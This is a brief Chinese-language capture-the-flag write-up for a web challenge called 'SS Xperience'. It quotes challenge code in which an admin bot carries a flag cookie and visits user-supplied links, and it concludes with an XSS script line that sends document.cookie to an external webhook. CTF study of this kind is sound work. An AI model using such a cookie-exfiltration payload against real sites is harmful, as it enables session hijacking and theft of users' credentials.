SS Xperience

18092952956 2024-09-09 16:09:40 468 0


constants.py

FLAG=os.getenv('FLAG',r'grey{fake_flag}')

COOKIE={"flag":FLAG}


flag在cookie里边,想到cookie外带。


adminbot中from constants import COOKIE  

driver.get(f'{baseUrl}/')

cookie={"name":"flag","value":COOKIE["flag"]}

driver.add_cookie(cookie)

driver.get(link)

print(f"Visited{link}")


server.py访问了adminbot的visit

很明显了,利用xss外带cookie

利用webhook进行接受,可能会有点慢,等个几分钟。

<scriptsrc="fetch(`https://webhook...../?cookie=${document.cookie}`)"></script>
分类:WEB
image
作者:18092952956

1

提交

0

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 8月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈